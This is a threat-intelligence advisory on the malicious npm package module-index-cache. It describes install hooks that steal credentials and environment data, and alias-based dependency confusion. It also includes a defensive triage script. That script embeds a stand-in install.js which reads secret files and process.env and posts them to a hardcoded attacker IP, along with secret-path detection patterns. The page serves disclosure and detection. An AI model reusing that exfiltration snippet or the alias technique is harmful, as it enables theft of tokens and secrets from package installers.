Supply-chain threat intelligence

Incident detail

critical · npm · malware · osv

Malicious code in module-index-cache (npm)

module-index-cache

Risk score

92

AI summary

Indexed incident for module-index-cache (npm).

Description

package.json declares preinstall, install, and postinstall hooks that all invoke install.js, so the payload runs unconditionally on npm install. install.js reads installer-side secrets and host data (/app/.env, /root/.npmrc, /home/node/.npmrc, /etc/npmrc, /app/.git/config, package.json, /proc/self/environ, and the full process.env, JSON-stringified and sliced to 15000 chars), runs shell reconnaissance (id, hostname, whoami, ls, ps, and find/grep for flag files), base64-encodes the bundle, and POSTs/PUTs it via http.request to the hardcoded endpoint http://154.57.164.76:30728/api/modules/ECT-839201.

The tarball additionally ships publish-and-arm.sh and arm-aliases.sh, which document and automate publishing the package under the aliases curse-dependent, spectral-corsair and @spectral-corsair/cursed-modules using npm:module-index-cache@1.0.2 redirection. The scripts label this explicitly as dependency-confusion and armed-alias-public-npm: the aim is to weaponize name confusion against private-registry consumers.

A CTF/cover-story framing in the comments does not change the installer impact: any machine that installs this package leaks its environment variables, npm auth tokens, dotenv contents, git configuration, and selected source and filesystem data to an attacker-controlled host.
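The two behaviours described above, unconditional lifecycle hooks that read secrets and phone home, and npm: alias redirection to a known-bad package, are both visible statically in a tarball before anything is installed. The following triage script is an added example written for this page; it is not code from the advisory, from ThreatPkg, or from the module-index-cache package. The package.json objects and the install.js stand-in it scans are constructed inputs that reproduce only the indicators named in the description (the secret paths, the hardcoded endpoint, the alias spec); the hook names, regexes and the KNOWN_BAD denylist are the author's choices.

```javascript
// Added example (not the advisory's or the package's own code): static triage of an
// npm package for (1) install hooks that read secrets and contact a hardcoded host and
// (2) "npm:" alias specs that redirect to a known-bad package version.

const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Indicators taken from the advisory text: installer-side secret sources and the
// shape of a hardcoded exfiltration URL.
const SECRET_SOURCE_PATTERNS = [
  /\.npmrc\b/, /\.env\b/, /\/proc\/self\/environ/, /\.git\/config/, /process\.env\b/,
];
const URL_PATTERN = /https?:\/\/[A-Za-z0-9.\-]+(?::\d+)?[^\s'"`]*/g;

// Affected versions from the advisory, used as a denylist for alias targets.
const KNOWN_BAD = { 'module-index-cache': new Set(['1.0.0', '1.0.1', '1.0.2']) };

function installHooks(pkg) {
  const scripts = pkg.scripts || {};
  return LIFECYCLE_HOOKS.filter((h) => typeof scripts[h] === 'string')
    .map((h) => ({ hook: h, command: scripts[h] }));
}

// "npm:<target>@<version>" specs install <target> under a different name.
function aliasedDependencies(pkg) {
  const out = [];
  for (const field of ['dependencies', 'devDependencies', 'optionalDependencies']) {
    for (const [name, spec] of Object.entries(pkg[field] || {})) {
      const m = /^npm:((?:@[^@/]+\/)?[^@]+)@(.+)$/.exec(spec);
      if (m) out.push({ field, name, target: m[1], version: m[2] });
    }
  }
  return out;
}

function scanInstallScript(src) {
  return {
    secretReads: SECRET_SOURCE_PATTERNS.filter((re) => re.test(src)).map((re) => re.source),
    endpoints: src.match(URL_PATTERN) || [],
    shellExec: /\bchild_process\b|\bexecSync\s*\(|\bspawnSync\s*\(/.test(src),
    base64: /toString\(\s*['"]base64['"]\s*\)/.test(src),
  };
}

// pkg: parsed package.json; files: { relativePath: source } for scripts shipped in the tarball.
function triage(pkg, files = {}) {
  const reasons = [];
  for (const { hook, command } of installHooks(pkg)) {
    const file = (command.match(/\bnode\s+(\S+)/) || [])[1];
    const src = file && files[file];
    if (!src) continue; // hook present but nothing to inspect: review by hand
    const r = scanInstallScript(src);
    if (r.secretReads.length && r.endpoints.length) {
      reasons.push(`${hook} runs ${file}: reads ${r.secretReads.join(', ')}; contacts `
        + r.endpoints.join(', ') + (r.shellExec ? '; spawns shell commands' : ''));
    }
  }
  for (const a of aliasedDependencies(pkg)) {
    const bad = KNOWN_BAD[a.target];
    if (bad && bad.has(a.version)) {
      reasons.push(`${a.field}.${a.name} is an npm: alias for known-bad ${a.target}@${a.version}`);
    }
  }
  return { verdict: reasons.length ? 'block' : 'allow', reasons };
}

// Constructed package.json mirroring the hook layout described in the advisory.
const SAMPLE_PACKAGE_JSON = {
  name: 'module-index-cache', version: '1.0.2',
  scripts: { preinstall: 'node install.js', install: 'node install.js', postinstall: 'node install.js' },
};
// Constructed stand-in for install.js carrying only the indicators named in the advisory.
const SAMPLE_INSTALL_JS = `
const http = require('http'), { execSync } = require('child_process');
const targets = ['/app/.env', '/root/.npmrc', '/etc/npmrc', '/app/.git/config', '/proc/self/environ'];
const bundle = { files: targets, env: JSON.stringify(process.env).slice(0, 15000), id: execSync('id').toString() };
const body = Buffer.from(JSON.stringify(bundle)).toString('base64');
http.request('http://154.57.164.76:30728/api/modules/ECT-839201', { method: 'POST' }).end(body);
`;
// Constructed package.json for a wrapper published under one of the alias names.
const SAMPLE_ALIAS_PACKAGE_JSON = {
  name: 'curse-dependent', version: '1.0.0',
  dependencies: { 'module-index-cache': 'npm:module-index-cache@1.0.2' },
};

console.log(triage(SAMPLE_PACKAGE_JSON, { 'install.js': SAMPLE_INSTALL_JS }));
console.log(triage(SAMPLE_ALIAS_PACKAGE_JSON));
```

Run the check against an unpacked tarball rather than an installed copy, so the hooks never execute; setting ignore-scripts=true in .npmrc (or passing --ignore-scripts to npm install) is the standard way to keep preinstall/install/postinstall from running at all while a package is being reviewed.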

Technical details

Affected versions

=1.0.0, =1.0.1, =1.0.2

Indicators

  • affected version =1.0.1 (75%)
  • affected version =1.0.0 (75%)
  • affected version =1.0.2 (75%)

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg

Related incidents